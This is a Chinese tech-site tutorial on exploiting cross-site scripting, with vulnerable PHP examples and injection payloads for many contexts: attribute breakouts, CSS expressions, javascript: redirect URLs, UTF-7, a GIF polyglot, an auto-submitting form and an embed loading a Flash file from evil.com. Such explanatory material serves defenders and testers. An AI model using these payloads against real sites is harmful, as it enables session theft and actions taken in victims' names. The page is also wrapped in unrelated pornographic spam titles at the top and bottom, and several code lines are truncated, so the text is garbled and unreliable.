精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

跨站腳本攻擊深入解析之:漏洞利用過程

原創
安全
在本文的上篇中,我們詳細介紹了當前Web應用所采取的安全措施,如同源策略、cookie安全模型以及Flash的安全模型;而本文將介紹跨站腳本漏洞利用的過程,并對HTML注入進行深入分析。

【51CTO.COM 獨家特稿】跨站腳本的名稱源自于這樣一個事實,即一個Web站點(或者人)可以把他們的選擇的代碼越過安全邊界線注射到另一個不同的、有漏洞的Web 站點中。當這些注入的代碼作為目標站點的代碼在受害者的瀏覽器中執行時,攻擊者就能竊取相應的敏感數據,并強迫用戶做一些用戶非本意的事情。

在本文的上篇中,我們詳細介紹了當前Web應用所采取的安全措施,如同源策略、cookie安全模型以及Flash的安全模型;而本文將介紹跨站腳本漏洞利用的過程,并對HTML注入進行深入分析。

一、跨站腳本漏洞利用的過程

現在,您已經熟悉了瀏覽器中的各種安全技術,下面我們開始設法利用XSS規避這些安全技術。XSS的主要目標是通過把攻擊者選擇的JavaScript、VBScript或者其它為瀏覽器所接受的腳本語言注入到(放進)某些Web應用程序之中。只要攻擊者可以將腳本植入有弱點的Web應用程序中的任何地方,瀏覽器就會認為這個腳本是來自該有弱點的Web應用程序,而非非出自攻擊者之手。

這樣的話,該腳本就能夠在這個有弱點的Web應用程序的域中運行了,并能進行下列活動:有權讀取那個有弱點的Web應用程序使用的Cookie;能夠看到該有弱點的Web應用程序提供的頁面的內容,甚至能將它們發送給黑客;改變有弱點的Web應用程序的外觀;回調運行有弱點的Web應用程序的服務器。

大體上,跨站點腳本攻擊可以分為三步進行

1.HTML注入。我們將介紹把腳本注入到Web應用程序的各種可能的方法。所有HTML注入范例只是注入一個JavaScript彈出式的警告框:a_lert(1)。

2.做壞事。如果您覺得警告框還不夠刺激,我們將討論當受害者點擊了一個被注入了HTML代碼的頁面鏈接時攻擊者能作的各種的惡意事情。

3.誘捕受害者。我們論述如何強制或者誘使受害者執行惡意JavaScript代碼。

一、HTML注入簡介

將HTML和(更為重要的)腳本代碼注入Web應用程序的方法簡直太多了。如果某個Web應用程序的HTTP響應中“照搬”了在HTTP請求中輸入的內容,例如尖括號、圓括號、句號、等號等,那么說明這個Web應用程序和域具有HTML注入漏洞,并且該漏洞十有八九可以用于XSS。

本節將為讀者介紹最常見的HTML注入方法,但是無法包括所有方法,因為這些方法是在太多了。對于大多數小型至中型的網站來說,這些技術很可能仍然奏效。只要有耐心,那么您或許也能夠使用其中的一種技術成功應用于一個大型Web站點。

下面我們將分門別類的介紹各種注入方法。

二、傳統的反射式和存儲式HTML注入

傳統的XSS攻擊是一種反射式的HTML注入攻擊,借此,一個Web應用程序接受在HTTP請求中的用戶輸入。該Web應用程序會返回一個HTTP響應,其主體中將包含原封不動的用戶輸入。如果該服務器的響應跟用戶的原始輸入完全一致,那么這些用戶輸入就會被瀏覽器當作有效的HTML、VBScript或者JavaScript進行解釋。考慮下列的服務器端的PHP代碼:

< html >
< body >
< ?php
if (isset($_GET{'UserInput'})){
$out = '您輸入的內容為: "' . $_GET{'UserInput'} . '".';
} else {
$out = '< form method=”GET”>請在此輸入內容: ';
$out .= '< input name="UserInput" size="50" >';
$out .= '< input type="submit" >';
$out .= '< /form >';
}
print $out;
? >
< /body >
< /html >

圖1展示了這段代碼放置到http://publicpages.daxue.edu/~someuser/MyPhp.php上后,客戶端看到的頁面內容。

圖1 一個簡單的PHP腳本,用以接收用戶輸入(MyPhp.php)

當用戶點擊“提交查詢”按鈕時,就會生成下列GET請求:

http://public-pages.daxue.edu/~someuser/MyPhp.php?input=hahaha

這個PHP應用程序看到用戶輸入的“hahaha”后,將響應一個頁面,如圖2所示。

圖2 用戶輸入“hahaha”后MyPhp.php回復的響應

下面顯示的是圖2中看到的頁面的HTML 源代碼,為醒目起見用戶輸入的內容這里以藍色字體顯示。

您輸入的內容為: "hahaha".

#p#

注意,實際上這里用戶可以輸入任何東西,例如〈 script 〉 a_lert( 1 )〈 / script 〉、〈 body onload = a_lert( 1 ) 〉、〈 img src = x onerror = a_lert( 1 ) 〉 或別的東西來把JavaScript代碼注入到該頁面。如果輸入 的話,將向服務器發送下列GET請求:

http://publicpages.daxue.edu/~someuser/MyPhp.php?input=

如前所述,這個PHP應用程序只是把用戶輸入放到返回的響應頁面中。這時候瀏覽器會把這些用戶輸入的內容當作JavaScript指令,同時認為該腳本來自服務器,這可真是應了那句老話“拿著雞毛當令箭”了,所以瀏覽器就會執行這些JavaScript代碼。圖3展示了用戶看到的樣子。

圖3 用戶輸入“ ”后MyPhp.php回復的響應

上圖中顯示的頁面的源代碼如下所示,其中用戶輸入用藍色字體表示。

您輸入的內容為: " ".

這是將 注入http://public-pages.daxue.edu/~someuser/MyPhp.php得到的結果。這個例子是一種典型的反射式的HTML注入,因為用戶在HTTP請求中發送JavaScript代碼,同時Web應用程序立即響應(反射回)一個完全相同的JavaScript代碼。只要用戶單擊了下列鏈接,這個腳本就會執行:

http://publicpages.daxue.edu/~someuser/MyPhp.php?input=

從攻擊者的角度來看,利用注入的ML代碼讓惡意的web頁面完成單擊或者指定次數的點擊是非常重要的。假設前面的PHP應用程序只接受POST請求,而不接受GET,如下所示:

< html >
< body >
< ?php
if (isset($_POST{'UserInput'})){
$out = '您輸入的內容為: "' . $_POST{'UserInput'} . '".';
} else {
$out = '< form method="POST" >請在此輸入內容: ';
$out .= '< input name="UserInput" size="50" >';
$out .= '< input type="submit" >';
$out .= '< /form >';
}
print $out;
? >
< /body >
< /html >

在這種情況下,攻擊者無法像上面的GET請求那樣直接通過誘騙受害者點擊一個鏈接來注入HTML代碼;現在,他們必須采取一些額外的步驟。為此,攻擊者可以創建下列HTML頁面:

< html >
< body >
< form name="evilForm" method="POST ction="http://publicpages.
daxue.edu/~someuser/MyPhp.php">
< input type="hidden" name="input" value="〈 script 〉a_lert ( 1 )〈 / script  〉" 〉
< script >
document.evilForm.submit()
< /script >
< /body >
< /html >

當用戶單擊了指向上述HTML頁面的鏈接時,就會對http://public-pages.daxue.edu/~someuser/MyPhp.php進行HTML注入。當然,攻擊者也能利用HTML注入干別的壞事,而不僅僅象征性地調用一個JavaScript的彈出窗口。“第二步:做壞事”部分將解釋攻擊者除了彈出一個窗口外還能做些什么。

存儲式HTML注入跟反射式HTML注入非常相似,唯一區別在于攻擊者將腳本植入Web應用程序后,這些腳本會被Web應用程序存儲到一個可以檢索的地方。例如,對于允許用戶張貼和閱讀消息的網絡論壇,攻擊者可以在張貼消息時注入HTML代碼,然后其它用戶閱讀這則含有腳本的消息時,其中的腳本就會執行。

三、定位存儲式和反射式HTML注入點

為了尋找存儲式和反射式HTML注入點,可以嘗試在所有表單輸入以及GET或者POST請求的所有參數中注入腳本。我們要假設參數/值對中的值都可能有漏洞。甚至嘗試在新生成的參數中注入HTML代碼,如下所示:

script 〉 a_lert ( ' parameter ' )= 不起作用,因為這些測試字符串并不出現在響應的HTML主體區。舉例來說,假如向http://search.engine.com/search?p= 發送的這個請求返回的響應中,其預填充表單字段內是我們的HTML注入字符串,如:

遺憾的是,腳本標簽會被作為用于表單輸入字段的字符串,所以無法執行。相反,嘗試http://search.engine.com/search?p=”> 的話,會得到如下所示的HTML應答:

〈 form input="text" name="p" value=",那么保不住攻擊者可以注入下列內容:

〈 /title 〉〈script 〉 a_lert( 1 ) 〈 /script 〉

這樣一來就擺脫了title標簽。USERINPUT3被放在一個式樣標簽中,任何人都可以在IE中設置USERINPUT3成下面的樣子:

black; background: url( ' javascript:a_lert( 1 ) ' );

于是他就能夠在Firefox使用它了:

1: expression( a_lert( 1 ) )

同樣的,有時候用戶輸入會作為其它的標簽的一部分出現在式樣參數中,如下所示:

如果您可以將USERINPUT3設為下面的值,那么就能在IE中運行JavaScript了:

javascript : a_lert(1)

或者對于Visual Basic愛好者,可以這樣使用:

vbscript:MsgBox(1)

Firefox不接受帶有JavaScript:協議處理程序的background:url()。然而,Firefox允許JavaScript作為表達式來執行,在Firefox中將USERINPUT3A設為下列值:

); 1:expression(a_lert(1)

USERINPUT4可以直接利用,只要將USERPINUT4設為:

";a_lert(1);

USERINPUT5被深深嵌入到JavaScript內部。為了插入(確保會執行的)a_lert(1)函數,您必須把a_lert(1)放到所有代碼塊之外,并保證JavaScript代碼的前前后后都是合法的,如下所示:

')){}a_lert(1);if(0)

A_lert(1)之前的文本完成了原先的if語句,因此能確保a_lert(1)函數總是被執行。a_lert(1)之后的文本創建了一個if語句用于剩余代碼塊,所以腳本標簽之間的全部代碼都是合法的JavaScript代碼。如果不這樣,JavaScript就會因為語法錯誤而無法解釋執行。

您可以使用一些詭計來把JavaScript注入到USERINPUT6中,例如,可以使用下面的方法:

"> < script >a_lert(1)< /script >

或者,如果不允許使用尖括號,則使用一個JavaScript事件處理程序,例如onclick事件處理程序,如下所示:

" onclick="a_lert(1)

USERINPUT7 還可以是這樣:

' >< script >a_lert(1)< /script >

或者:

' style='x: expression( a_lert ( 1 ) )

甚至更簡單一些:

javascript: a_lert( 1 )

對于USERINPUT7的前兩條利用方法能保證腳本在裝入頁面時執行,最后一種方法要求用戶單擊鏈接。您可以把它們都試一遍,看看是不是在某些情況下有些字符和字符串是不允許的。

USERINPUT8也面臨類似的HTML注入字符串。下面是使用事件處理程序的最佳方式:

notThere' onerror='a_lert( 1 )

XSS防御方法通常是對具有潛在惡意性的字符進行轉義或者編碼。舉例來說,如果用戶輸入 到一個文本字段,服務器可能以下列轉義后的字符串作為響應:

根據轉義后的字符串的所在位置,這些字符串將以本來面目出現并且不會執行。轉義方法比較復雜,所以將在后面的對抗措施中加以詳細討論。大多數轉義例程不是忘記對具有潛在惡意性的字符和字符串進行轉義,就是使用了錯誤的編碼方法進行換碼。例如USERINPUT9,其事件處理程序把HTML實體編碼為ASCII,所以任何人可以用下列兩個字符串上演相同的攻擊:

x'); a_lert ( 1 );

以及:

x'); a_lert( 1 )

最后,USERINPUT10可以用事件處理程序利用,并突破輸入標簽,例子如下所示:

x onclick= a_lert ( 1 )

這個例子說明,用戶提供的字符串可以放到HTTP應答中的任何地方,看來真是一切皆有可能呀!

如果您在任何前面的實例中成功進行了HTML注入,那么該HTML注入就可用于在那個域上的任何地方的XSS。您可以用多種不同的方法來向Web應用程序注入JavaScript。如果你的嘗試曾經導致頁面格式被破壞,諸如截斷頁面、顯示了除您注入以外的腳本,那么很可能就是找到了一個XSS漏洞。

四、重定向器中的反射式HTML注入

HTML注入的另一個大舞臺是重定向器。有些重定向器允許用戶重定向到任何URL。 遺憾的是,JavaScript:a_lert(1)是一個合法的URL。許多重定向器會對URL進行解析,以確定重定向到那里是否安全。這些解析器以及他們的程序員并不總是人們想象的那么聰明,所以像下面的URL:

javascript://www.anywhere.com/%0da_lert( 1 )

以及這個:

javascript://http://www.trustedsite.com/trustedDirectory/%0da_lert( 1 )

可能被接受。在上面的例子中,任何字符串都可以放置在JavaScript注解所用的雙斜杠之間以及URL編碼的換行符(%0d)之間。#p#

五、移動式應用中的HTML注入

有些流行的Web應用程序被移植到移動通信領域。這些移動式應用一般具有相同的功能,但是安全特性更差,并且仍然可以通過諸如IE 以及Firefox之類的瀏覽器進行訪問。 因此,它們是HTML注入攻擊以及跨站請求偽造的理想攻擊目標。

通常情況下,移動式應用作為主要的Web應用程序運行在相同的域上,因此移動式應用中的任何HTML注入都能夠訪問整個域,包括運行在該域上的主要的Web應用程序或者其它的Web應用程序。

六、在Ajax響應以及錯誤信息中的HTML注入

并非所有HTTP應答都會顯示給用戶。類似AJAX響應以及超文本傳輸協議(http)錯誤消息這些頁面通常會被開發人員所忽視。開發人員可能沒有考慮為AJAX響應提供HTML注入保護,因為這些請求通常不是由用戶直接使用的。然而,攻擊者可以用先前的代碼片斷模仿AJAX的GET以及POST請求。

同樣的,超文本傳輸協議(http)錯誤響應,諸如HTTP 404(Not Found)、HTTP 502(Server Error)等等,通常也會被開發人員所忽略。開發人員傾向于假定一切都是HTTP 200(OK)。您可以嘗試觸發其它的響應,而非僅僅HTTP 200,然后試著注入腳本。

七、使用UTF-7編碼進行HTML注入

如果用戶的IE自動選擇編碼集,那么攻擊者就能規避大多數HTML注入預防措施。就像前面提到的那樣,HTML注入的預防措施一般依賴于對潛在的有害字符進行轉義處理。然而,UTF-7編碼技術使用了無法正常轉義的通用字符,而這些通用字符有時無法被某些Web應用程序進行換碼。 的UTF-7轉義版本將是下面的樣子:

+ADw-script+AD4-a_lert(1)+ADw-/script+AD4-

注意,這是一種不常見的攻擊,因為用戶一般不會打開自動選擇編碼技術選項。當然,也存在其他的利用字符編碼可變長度的UTF編碼攻擊技術,但是這要求對UTF有著深入廣泛的理解,所以它超出了本文的討論范圍。然而,這個問題說明其它編碼(例如MIME類型)的疏漏也是能引起HTML注入的。

八、利用MIME 類型不匹配來進行HTML注入

IE具有許多令人驚訝的未公開特性,例如,IE7 以及之前的版本嘗試加載一個圖像或者其它的非HTML的響應并且失敗時,它會將該響應作為HTML對待。為了弄明白這個情況,我們可以創建一個文本文件,并包含下列內容:

之后,將其保存為alert.jpg,然后在IE的URL地址欄中或一個iframe中裝載的這個“圖像”,這就會導致這里的JavaScript被執行。
注意,如果該文件是從一個圖像標簽加載的話,它就不會作為腳本執行了。

一般說來,當您試圖上載這樣的一個文件到一個圖像托管服務時,該服務將拒絕這個文件,因為它根本就不是一個圖像。但是圖像托管服務通常情況下會忽視文件的擴展名,而只通過文件的幻數(開始幾個字節)來確定文件類型。

因此,攻擊者可以避開它,方法是用GIF注釋中的HTML來創建一個GIF圖像,然后將這個GIF保存為.jpg文件擴展名的文件。下面是一個單像素的GIF文件,如下所示:

00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff |GIF89a..........|

00000010 ff ff ff 21 fe 19 3c 73 63 72 69 70 74 3e 61 6c |...!.. .|

00000030 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b |,...........D..;|

將其命名為test.jpg,并在IE中加載它,這會導致執行這段JavaScript。這也是注入Flash跨域政策的一種好方法。只要把Flash安全策略的XML內容放入GIF注釋,并保證這個GIF文件不包含擴展的ASCII字符或者字節NULL即可。您還可以把HTML注入到未壓縮的圖像文件(諸如XPM以及BMP文件)的圖像數據部分,而不是注解中。

九、使用Flash進行HTML注入

在大多數HTML注入情形中,攻擊者可以注入任意的HTML。舉例來說,攻擊可以注入一個對象和/或嵌入一個標簽來加載該域上的Flash應用程序。 下面是一個例子:

src="http://evil.com/evil.swf" width="1" height="1">

這里的HTML有些繁瑣,但是它將JavaScript應用程序具有的控制權賦予一個Flash應用程序,例如(經過ExternalInterface類)讀取Cookie、(經過ExternalInterface類)改變web頁面外觀、(經過XML類)讀取用戶私人數據以及(經過XML類)以受害者的名義建立HTTP請求。

然而,Flash應用程序有時候會提供更多的功能。例如,flash應用程序可以通過Socket類創建原始的套按字連接。這允許攻擊者構造他們的完整的HTTP數據包(包括通過ExternalInterface類竊取Cookie)或者連接到電腦允許的其它端口上。

注意,Socket連接只能建立到達惡意腳本所源自的域的連接,除非攻擊者為完成攻擊還反射了一個不安全的跨域策略文件。

有些開發人員通過把響應的MIME類型設置為text/plain或者除text /html以外的任何東西來防止AJAX響應被注入HTML。HTML注入將無法進行,因為瀏覽器不會把響應解釋為HTML。然而,Flash并不關心跨域策略文件是哪種MIME類型,所以攻擊者有可能使用AJAX響應來反射一個不安全的跨域策略文件。

這允許惡意的Flash應用程序以受害者名義向有弱點的Web應用程序發送請求,讀取該域上的任意的頁面,并創建到達該域的套按字連接。這種類型的攻擊的威脅相對較弱,因為惡意的Flash應用程序不能竊取Cookie(但是它仍然可以以用戶的名義來完成任何動作),而且它不能在受害的用戶前模仿成應用程序,除非惡意的Flash應用程序將用戶重定向到一個攻擊者控制下的域。

然而,到目前為止,HTML注入所能做的最邪惡的事情還是在受害用戶目前把自己裝扮成Web應用程序,當然,通過其它方法也可以達到此目的,比如反射一個不安全的跨域策略文件,并使用ActionScript的XML類發送HTTP的GET和POST請求并且讀取響應。 在下一節中,我們描述攻擊是如何作惡的。

十、結束語

在瀏覽器中已經建立了一些安全措施——即同源策略和Cookie安全模型。此外,一些瀏覽器插件,諸如Flash Player、Outlook Express 以及Acrobat Reader等,帶來了更多的安全問題和安全措施。然而,如果攻擊者可以強迫用戶執行源自特定域的JavaScript的話,這些額外的安全措施總是傾向于削弱同源策略的力量。

跨站點腳本攻擊(XSS)技術能夠強迫用戶執行攻擊者以受害者名義在某個域上選擇的腳本,如JavaScript、VBScript、ActionScript,等等。XSS要求某個域上的Web應用程序能夠提供(即供應、返回)被攻擊者所控制的字符。

因此,攻擊者可以向頁面注入代碼,而這些代碼將來會在這個有弱點的域的上下文中執行。而本文將介紹跨站腳本漏洞利用的過程,并對HTML注入進行深入分析;我們將在下篇中詳細介紹跨站腳本的危害,以及攻擊者是如何誘騙受害者的,以及針對跨站腳本攻擊的防御措施。

【51CTO.COM 獨家特稿,轉載請注明出處及作者!】

責任編輯:安泉 來源: 51CTO.com
相關推薦

2009-03-09 17:19:53

2010-06-07 20:19:49

2009-02-24 17:19:38

2020-12-21 09:40:06

腳本攻擊XSS漏洞

2012-11-15 09:51:36

2017-06-14 16:08:31

2010-09-27 17:37:10

2012-04-12 14:45:13

2013-01-11 17:33:46

2010-09-10 10:57:33

2010-06-30 16:26:05

2010-09-09 11:19:10

2010-09-10 14:13:11

2009-10-23 13:08:23

2023-06-15 12:26:32

2010-04-26 16:42:09

淘寶網安全漏洞

2015-02-01 09:26:10

2009-10-27 15:21:04

2009-10-27 15:09:04

2014-11-27 09:26:23

點贊
收藏

51CTO技術棧公眾號

六九午夜精品视频| 在线观看国产小视频| 都市激情亚洲欧美| 婷婷丁香久久五月婷婷| 精品蜜桃一区二区三区| 国产乱国产乱老熟| 成人高清电影网站| 欧美一级国产精品| 97国产精东麻豆人妻电影| 黄色软件在线| 韩国理伦片一区二区三区在线播放| 精品奇米国产一区二区三区| 日本一级黄视频| 欧美香蕉爽爽人人爽| 久久99日本精品| 久久久久国产精品免费网站| 亚洲精品乱码久久久久久久久久久久 | 色综合99久久久无码国产精品| 在线手机中文字幕| 国产精品久久久久精k8| 99热在线播放| 无码人妻熟妇av又粗又大| 日韩综合精品| 亚洲第一网站免费视频| 久久久精品麻豆| 日韩欧美一起| 国产网站一区二区| 91九色在线免费视频| 免费视频久久久| 午夜日韩在线| 伊人激情综合网| 永久免费未满蜜桃| 日韩精品一页| 色综合天天视频在线观看| 国产性猛交xxxx免费看久久| 日本不卡一区二区在线观看| 2024最新电影在线免费观看| 人人精品人人爱| 欧美成人午夜视频| 成人在线一级片| 国产精品宾馆| 3751色影院一区二区三区| 国产91对白刺激露脸在线观看| 黄色网页网址在线免费| 国产视频一区二区在线观看| 国产伦精品一区二区三区照片91| 国产又粗又猛又黄又爽| 首页国产欧美久久| 性色av一区二区咪爱| 91视频青青草| 日本久久精品| 亚洲视频axxx| 在线免费观看成年人视频| av成人资源| 日韩欧美综合在线| 亚洲一区二区图片| 国产第一精品| 欧美日韩中文在线| 91.com在线| 97caopron在线视频| 国产精品美女久久久久久久久| 国产精品一 二 三| 亚洲欧美另类综合| 国产91露脸合集magnet| 91免费观看| 99久久久久成人国产免费| 久88久久88久久久| 国产欧美日韩综合精品| 糖心vlog精品一区二区| 日韩精品一二三| 国产ts一区二区| 欧美激情黑白配| 久久精品二区三区| 日本久久久久亚洲中字幕| 中文字幕视频网站| 亚洲一区日韩在线| 琪琪亚洲精品午夜在线| 国产伦精品一区二区三区视频我| 亚洲欧美日韩视频二区| 全亚洲最色的网站在线观看| 在线免费黄色av| 久久亚洲视频| 国产精品视频久久久久| 一二三区中文字幕| 国产精品一二三四| 国产精品日韩欧美一区二区| 日本美女一级片| 久久久久一区二区三区四区| 日韩少妇中文字幕| 尤物视频在线免费观看| 亚洲人吸女人奶水| 国产免费裸体视频| 欧美a级在线观看| 欧美性三三影院| 一级做a免费视频| ady日本映画久久精品一区二区| 亚洲精品久久久一区二区三区 | 色8久久影院午夜场| 在线观看91精品国产入口| 日韩肉感妇bbwbbwbbw| 99tv成人影院| 日韩av在线看| 亚洲AV成人无码网站天堂久久| 亚洲欧美一级二级三级| 55夜色66夜色国产精品视频| 国产精品无码粉嫩小泬| 蜜桃av一区二区三区电影| 成人淫片在线看| 午夜小视频在线播放| 国产精品国产三级国产三级人妇| av 日韩 人妻 黑人 综合 无码| 麻豆免费版在线观看| 欧美综合一区二区三区| 一区二区三区人妻| 欧美女优在线视频| 久色乳综合思思在线视频| 日本系列第一页| 麻豆视频观看网址久久| 国产日韩欧美精品| 1024国产在线| 欧美日韩国产丝袜美女| 在线视频观看91| 台湾佬综合网| 欧美国产日韩精品| 在线黄色av网站| 91看片淫黄大片一级| 日本三日本三级少妇三级66| 成年网站在线视频网站| 欧美在线视频日韩| 四虎永久免费观看| 91一区在线| 欧亚精品中文字幕| 亚洲狼人综合网| 亚洲欧美一区二区在线观看| 国产在线青青草| 日韩三级av高清片| xxav国产精品美女主播| 综合网在线观看| 懂色av中文一区二区三区| 亚洲精品中文字幕乱码三区不卡| 日本蜜桃在线观看视频| 日韩亚洲欧美一区| 四虎影视1304t| 国产精品美女久久久| 高清视频一区| 国产美女福利在线| 欧美理论片在线| 国产又粗又硬视频| 久久久www| 精品国产电影| 9999精品成人免费毛片在线看| 欧美精品日韩综合在线| 一区二区黄色片| 国产情侣久久| 精品国产乱码久久久久久丨区2区| av在线官网| 欧美一区永久视频免费观看| 亚洲精品国产精品乱码在线观看| 久久视频一区| 欧美日韩综合另类| 中文不卡1区2区3区| 亚洲精品按摩视频| 在线免费观看毛片| 97久久久精品综合88久久| 国产va亚洲va在线va| 91成人福利| 久久免费福利视频| 精品人妻一区二区三区蜜桃| 国产精品国产三级国产aⅴ原创| 校园春色 亚洲色图| 欧美日韩中文字幕一区二区三区 | 日本不卡在线播放| 户外露出一区二区三区| 亚洲天堂网站在线观看视频| 天码人妻一区二区三区在线看| 久久综合色播五月| 国产精品黄视频| 亲子乱一区二区三区电影| 无码人妻久久一区二区三区 | 亲子乱一区二区三区电影| 日韩一二三四| 色悠悠亚洲一区二区| 日本精品在线观看视频| 六月丁香婷婷色狠狠久久| 一本色道久久综合亚洲精品婷婷 | 欧美一区二区三区精品电影| 久草福利在线视频| 91久久精品一区二区二区| 女人十八毛片嫩草av| 精品综合久久久久久8888| 免费观看黄色的网站| 日韩一区二区三区色| 97欧美精品一区二区三区| 黄色片在线免费看| 7777精品伊人久久久大香线蕉超级流畅| 精品少妇一区二区三区密爱| 国产一区欧美二区| 2018中文字幕第一页| 奇米狠狠一区二区三区| 成人免费网视频| 白浆在线视频| 在线电影中文日韩| 亚洲AV无码精品自拍| 欧美视频在线观看免费网址| 国产三级黄色片| 国产91丝袜在线播放九色| 国产又大又硬又粗| 66视频精品| 久久精品日产第一区二区三区乱码| 欧美性猛交xxx高清大费中文| 久久精品国产清自在天天线 | 精品亚洲国内自在自线福利| 国产又粗又硬又长| 精品视频高潮| 91精品国产综合久久男男| 538视频在线| 日韩一二三在线视频播| 色在线免费视频| 欧美一区二区三区电影| 国产成人精品777777| 亚洲精品第一国产综合野| 91av在线免费| 国产一区二区三区国产| 欧在线一二三四区| 欧美日韩三区| 一本色道久久综合亚洲二区三区 | a天堂中文在线88| 精品sm捆绑视频| 国产又大又粗又硬| 日本大香伊一区二区三区| 久久这里只有精品国产| 国产日产欧美一区| 国产人成视频在线观看| 精品一区二区久久久| 久久精品香蕉视频| 日韩午夜av| 中文字幕一区二区三区乱码| 制服丝袜日韩| 91视频国产一区| 韩国理伦片久久电影网| 欧美中在线观看| 麻豆视频在线观看免费网站黄| 欧美精品生活片| 激情在线小视频| 色婷婷综合久久久久| 天堂中文在线看| 精品美女在线播放| 亚洲网站在线免费观看| 色综合激情五月| 久久久久久久久久久久久久久久久| 国产无遮挡一区二区三区毛片日本| 偷偷色噜狠狠狠狠的777米奇| 国产成人日日夜夜| av在线网站免费观看| 久久国产精品99久久久久久老狼| 白嫩少妇丰满一区二区| 久久中文在线| 亚洲中文字幕久久精品无码喷水| 一本久久知道综合久久| 久久综合九色综合88i| 1024日韩| 青青草国产精品视频| 欧美久久99| 欧美日韩视频免费| 国语精品一区| 日韩精品 欧美| 亚洲欧美日韩视频二区| 免费大片在线观看| 免费精品视频在线| 欧美日韩精品区别| 狠狠色综合播放一区二区| 欧美日韩久久婷婷| 国产精品1024| 久久国产劲爆∧v内射| 成人精品电影在线观看| 在线免费看黄色片| 26uuu久久天堂性欧美| 巨胸大乳www视频免费观看| 91丨九色porny丨蝌蚪| www.中文字幕av | 99久久久无码国产精品不卡| 亚洲欧洲精品一区二区三区不卡| 99成人在线观看| 亚洲欧美国产毛片在线| 中文在线观看免费网站| 日韩欧美中文第一页| 中文字幕观看在线| 欧美一区二区三区四区视频| 日韩一级片免费观看| 亚洲美女喷白浆| 137大胆人体在线观看| 两个人的视频www国产精品| 97久久人人超碰caoprom| 日本精品久久久| 成人在线观看免费视频| 亚洲影院高清在线| 日韩精品丝袜美腿| 亚洲图片都市激情| 在线看片欧美| 91人人澡人人爽人人精品| 国产一区二区三区四区五区入口| 蜜桃视频无码区在线观看| 久久久亚洲国产美女国产盗摄| 天堂网中文在线观看| 亚洲在线视频免费观看| 影音先锋亚洲天堂| 欧美区在线观看| 日韩中文字幕综合| 日韩中文字幕在线看| 国内高清免费在线视频| 国产精品 欧美在线| 欧美电影院免费观看| 极品日韩久久| 亚洲va在线| 精品免费国产一区二区| 国产激情一区二区三区| 国产ts丝袜人妖系列视频| 中文字幕一区二区三中文字幕| 日韩伦人妻无码| 日韩欧美在线中文字幕| 国产三级精品在线观看| 亚洲欧美日韩视频一区| 黑人玩欧美人三根一起进| 国产欧美一区二区| 日韩mv欧美mv国产网站| 黄色高清视频网站| 视频在线在亚洲| 国产xxxx视频| 亚洲精品国产第一综合99久久| 免费看一级视频| 欧美精品一区二区精品网| 成人福利在线观看视频| 国产精品视频久久久久| 校园春色另类视频| 男人添女荫道口喷水视频| 激情六月婷婷久久| 中文字幕第24页| 欧美日韩国产在线看| 国产女人18毛片18精品| 一区二区三区 在线观看视| 理论不卡电影大全神| 国产精品美女久久久久av福利| 天天做天天爱综合| 亚洲一区二区三区四区五区xx| 91麻豆swag| 国产又黄又爽又色| 精品国内二区三区| 日本精品600av| 91在线播放国产| 婷婷伊人综合| 色一情一区二区三区| 中文字幕精品一区二区精品绿巨人 | 最新国产精品久久| 人妖欧美一区二区| 超碰人人干人人| 91成人在线免费观看| 日韩一级片免费在线观看| 久久久精品国产亚洲| 999精品视频在线观看| 中文字幕欧美日韩一区二区| 久久精品免费观看| 夫妻性生活毛片| 91 com成人网| 中文字幕在线观看播放| 91九色国产在线| 在线一区电影| 日韩黄色一区二区| 欧美日韩中国免费专区在线看| 黄色av免费在线观看| 国产免费一区视频观看免费 | 久久久97精品| 国产精品毛片视频| 美女网站免费观看视频| 国产精品电影院| 蜜臀久久99精品久久久| 日本中文字幕不卡免费| 国产精品99久久久久久动医院| 超碰人人cao| 色呦呦网站一区| 国产欧美黑人| 麻豆精品视频| 激情深爱一区二区| 在线能看的av| 久久精品视频在线观看| 精品久久对白| 91视频这里只有精品| 婷婷六月综合亚洲| 1区2区3区在线观看| 国产一区二区无遮挡| 免费成人在线视频观看| 国产一级做a爰片在线看免费| 亚洲午夜av久久乱码| 91成人福利| 久久撸在线视频| 精品人伦一区二区三区蜜桃网站| 思思99re6国产在线播放| 极品校花啪啪激情久久| 国产在线不卡一区| 国产又粗又猛又黄视频| 欧美另类老女人|